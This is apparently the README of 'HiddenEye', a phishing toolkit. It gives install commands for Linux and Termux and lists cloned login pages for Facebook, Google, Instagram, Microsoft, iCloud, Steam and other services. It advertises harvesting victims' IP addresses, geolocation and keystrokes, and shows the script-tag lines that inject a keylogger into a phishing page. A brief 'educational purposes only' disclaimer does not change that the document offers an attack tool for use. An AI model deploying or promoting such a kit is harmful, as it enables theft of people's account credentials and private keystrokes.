Modern phishing tool with advanced functionality
NOW WE HAVE ADDED KEYLOGGER WITH THE PHISHING PAGES // VICTIM DEVICE INFO ALSO AVAILABLE
PREREQUISITES ( Please verify if you have installed )
- Python 3
- Wget from Python
- PHP
- sudo
TESTED ON FOLLOWING
-
Kali Linux - Rolling Edition
-
Parrot OS - Rolling Edition
-
Linux Mint - 18.3 Sylvia
-
Ubuntu - 16.04.3 LTS
-
MacOS High Sierra
-
Arch Linux
-
Manjaro XFCE Edition 17.1.12
-
Black Arch
HOW TO INSTALL
CLONE
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
RUNNING (In Linux)
cd HiddenEye
sudo apt install python3-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py
OR
./HiddenEye.py
RUNNING (If distro based on Arch Linux)
cd HiddenEye
sudo pacman -Syu
sudo pacman -S python-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py
OR
./HiddenEye.py
RUNNING (For Android users in Termux)
First install { Termux } from Playstore.
After opening Follow below commands One by one
pkg install git python php curl openssh grep
pip3 install wget
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
cd HiddenEye
chmod 777 HiddenEye.py
python HiddenEye.py
or
./HiddenEye.py
Running (One Code installation in Termux)
First install { Termux } from Playstore.
After opening Copy and run this Single Command.
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
AVAILABLE PAGES
+ Facebook:
- Traditional Facebook login page.
- Advanced Poll Method.
- Fake Security login with Facebook Page.
- Facebook messenger login page.
+ Google:
- Traditional Google login page.
- Advanced Poll Method.
+ LinkedIn:
- Traditional LinkedIn login page.
+ Github:
- Traditional Github login page.
+ Stackoverflow:
- Traditional Stackoverflow login page.
+ Wordpress:
- Similar Wordpress login page.
+ Twitter:
- Traditional Twitter login page.
+ Instagram:
- Traditional Instagram login page.
- Instagram Autoliker Phishing Page [ ADVANCED METHOD ADOPTED ].
WHAT'S NEW FEATURES
1) LIVE ATTACK
- Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
2) COMPATIBILITY
- All the sites are mobile compatible.
3) KEYLOGGER
- Now you will also have the ability to capture all the keystokes of victim.
**(CURRENTLY):- This feature is added on instagram web page and github, to less the possibility of slow functioning of generated link)
**HOW TO ADD IT MANUALLY ? -- You can add this manually by putting the codes on index page.(put these code at anywhere inside the index page // but not between any other script codes)
<script src="keylogger.js"></script>
<script src="keylogger.php"></script>
NEW PAGES
1) FACEBOOK PHISHING:
- Traditional Facebook login page.
- Advanced Poll Method.
- Fake Security login with Facebook Page.
- Facebook messenger login page.
2) INSTAGRAM PHISHING:
- Traditional Login Page
- Fake instagram Autoliker Page [ REDIRECTS TO ORIGINAL AUTOLIKER PAGE AFTER SUBMIT ]
3) SNAPCHAT PHISHING:
- Traditional Snapchat Login Page
4) YAHOO PHISHING:
- Traditional Yahoo Login Page
5) TWITCH PHISHING:
- Traditional Twitch Login Page [ Login With Facebook Also Available ]
6) MICROSOFT PHISHING:
- Traditional Microsoft-Live Web Login Page
7) STEAM PHISHING:
- Traditional Steam Web Login Page
8) VK PHISHING:
- Traditional VK Web Login Page
- Advanced Poll Method
9) ICLOUD PHISHING:
- Traditional iCloud Web Login Page
SCREENSHOT
DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.